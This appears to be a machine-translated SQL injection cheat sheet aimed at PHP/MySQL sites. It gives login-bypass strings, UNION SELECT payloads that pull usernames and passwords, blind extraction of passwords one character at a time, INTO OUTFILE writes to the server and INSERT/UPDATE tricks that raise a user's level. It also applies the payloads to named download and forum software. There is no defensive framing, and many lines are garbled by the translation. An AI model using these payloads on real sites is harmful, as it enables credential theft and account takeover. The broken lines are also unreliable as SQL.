PHP injection tianshu

PHP injection Library

'Or 1 = 1
'Or' 1 = 1
'/*
'% 23
'And Password = 'mypass
Id =-1 Union select 1, 1
Id =-1 Union select char (97), char (97), char (97)
Id = 1 Union select 1, 1 from Members
Id = 1 Union select 1, 1 from Admin
Id = 1 Union select 1, 1 from user
Userid = 1 and Password = mypass
Userid = 1 and mid (password, 112) = char)
Userid = 1 and mid (password, 4, 1) = char (97)
And ord (mid (password, 111)> (the Ord function is very useful and can return an integer)
'And length (password) = '6 (length of the probe password)
'And left (password, 1) =' m
'And left (password, 2) = 'my
.............................. And so on
'Union select 1, username, password from user /*
'Union select 1, username, password from user /*
= 'Union select 1, username, password from user/* (can be 1 or = followed directly)
99999 'Union select 1, username, password from user /*
'Into outfile' C:/file.txt (export file)
= 'Or 1 = 1 into outfile' C:/file.txt
1 'Union select 1, username, password from user into OUTFILE 'C:/user.txt
Select password from admins where login = 'john' into dumpfile'/path/to/site/file.txt'
Id = 'Union select 1, username, password from user into OUTFILE
Id =-1 Union select 1, database (), version () (flexible application query)
Commonly used query test statement,
Select * from table where 1 = 1
Select * from table where 'uuu '= 'uuu'
Select * from table where 1 <> 2
Select * from table where 3> 2
Select * from table where 2 <3
Select * from table where 1
Select * from table where 1 + 1
Select * from table where 1--1
Select * from table where isnull (null)
Select * from table where isnull (COT (0 ))
Select * from table where 1 is not null
Select * from table where NULL is null
Select * from table where 2 between 1 and 3
Select * from table where 'B' between 'A' and 'C'
Select * from table where 2 in (0, 1, 2)
Select * from table where case when 1> 0 then 1 end

For example, the night cat Download System Version 1.0
Id = 1 Union select, 1
Union select, 1 from ymdown_user
Union select 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 from ymdown_user where id = 1
Id = 10000 Union select, 1 from ymdown_user where id = 1 and groupid = 1
Union select 1, username, 1, password, 1 from ymdown_user where id = 1 (replace, look for a password)
Union select, 1 from ymdown_user where id = 1 and ord (mid (password )) = 49 (verify the First password)
Union select, 1 from ymdown_user where id = 1 and ord (mid (password )) = 50 (second digit)
Union select, 1 from ymdown_user where id = 1 and ord (mid (password,) = 51
..................................................................

Example 2: gray track transformation ID test (meteor)
Union % 20 (select % 20 allowsmilies, public, userid, '2017-0-0 ', user (), version () % 20 from % 20calendar_events % 20 where % 20 eventid % 20 = % 2013) % 20 order % 20by % 20 eventdate
Union % 20 (select % 20 allowsmilies, public, userid, '2017-0-0 ', pass (), version () % 20 from % 20calendar_events % 20 where % 20 eventid % 20 = % 2010) % 20 order % 20by % 20 eventdate
Construction statement:
Select allowsmilies, public, userid, eventdate, event, subject from calendar_events where eventid = 1 Union (select 1, 1, 1, 1, 1 from user where userid = 1)
Select allowsmilies, public, userid, eventdate, event, subject from calendar_events where eventid = 1 Union (select 1, 1, 1, 1, username, password from user where userid = 1)
Union % 20 (select % ,,0, 2, '1970-01-01 ', 'A', password % 20 from % 20 USER % 20 where % 20 userid % 20 = % 1999) % 20 order % 20by % 20 eventdate
Union % 20 (select % ,,0, 12695, '1970-01-01 ', 'A', password % 20 from % 20 USER % 20 where % 20 userid = 1999) % 20 order % 20by % 20 eventdate
Union % 20 (select % ,,0, 12695, '1970-01-01 ', 'A', userid % 20 from % 20 USER % 20 where % 20 username = 'sandflee ') % 20 order % 20by % 20 eventdate (check the sand ID)

(Select a from table_name where a = 10 and B = 1 order by a limit 10)
Select * from article where ArticleID = '$ id' Union select * from ...... (You can directly submit fields in the same circumstances as the database)
Select * from article where ArticleID = '$ id' Union select, 1 from ...... (In different cases)

Special tips: Write in forms, search engines, and other places:
"___"
".__"
"%
% 'Order by ArticleID /*
% 'Order by ArticleID #
_ 'Order by ArticleID /*
_ 'Order by ArticleID #

$ Command = "dir C:/"; system ($ command );
Select * from article where ArticleID = '$ id'
Select * from article where ArticleID = $ ID
1 'and 1 = 2 Union select * from user where userid = 1 /*
(Select * from article where ArticleID = '1' and 1 = 2 Union select * from user where userid = 1 /*')
1 and 1 = 2 Union select * from user where userid = 1

Statement format: Create a database, insert:
Create Database 'inobjection'
Create Table 'user '(
'Userid' int (11) not null auto_increment,
'Username' varchar (20) not null default '',
'Password' varchar (20) not null default '',
Primary Key ('userid ')
)
Insert into 'user' values (1, 'SWAp ', 'mypass ');

Insert as a registered user:
Insert into 'user' (userid, username, password, homepage, userlevel) values ('', '$ username',' $ password', '$ homepage ', '1 ');
"Insert into membres (login, password, nom, email, userlevel) values ('$ login',' $ pass', '$ nom',' $ email ', '1 ')";
Insert into membres (login, password, nom, email, userlevel) values ('', '3') # ', '1 ')
"Insert into membres set login = '$ login', password =' $ pass', nom = '$ nom', email =' $ m '";
Insert into membres set login = '', password ='', nom = '', userlevel = '3', email =''
"Insert into membres values ('$ id',' $ login ',' $ pass', '$ nom',' $ email ', '1 ')";

Update user SET Password = '$ password', homepage =' $ homepage 'where id = '$ id'
Update user SET Password = 'md5 (mypass) 'Where username = 'admin' #)', homepage = '$ homepage' Where id = '$ id'
"Update membres SET Password = '$ pass', nom =' $ nom', email = '$ email' Where id = '$ id '";
Update membres SET Password = '[pass]', nom = '', userlevel = '3', email = ''where id = '[ID]'
"Update News set votes = votes + 1, score = score + $ note where idnews = '$ id '";

Extended functions:
Database ()
User ()
System_user ()
Session_user ()
CURRENT_USER ()
For example:
Update article set Title = $ title where ArticleID = 1 corresponding function
Update article set Title = database () Where id = 1
# Update the current database name to the title Field
Update article set Title = user () Where id = 1
# Update the current MySQL user name to the title Field
Update article set Title = system_user () Where id = 1
# Update the current MySQL user name to the title Field
Update article set Title = session_user () Where id = 1
# Update the current MySQL user name to the title Field
Update article set Title = CURRENT_USER () Where id = 1
# Update the authenticated username of the current session to the title field.

:::::::::::::::::::::::::::::::::::::::: :::::::::::::::::::::::::::::::::::
$ Req = "select * From membres where name like '% $ search %' order by name ";
Select * From membres where name like '%' order by uid # % 'order by name
Select * From membres where name like '%' order by uid # % 'order by name
Select uid from admins where login = ''or 'A' = 'A' and Password ='' or 'A' = 'A' (Classic)
Select uid from admins where login = ''or admin_level = 1 # 'and Password =''
Select * from table where MSG like '% hop'
Select uid from membres where login = 'bob' and password like 'a % '#' and Password =''
Select * From membres where name like '%' order by uid # % 'order by name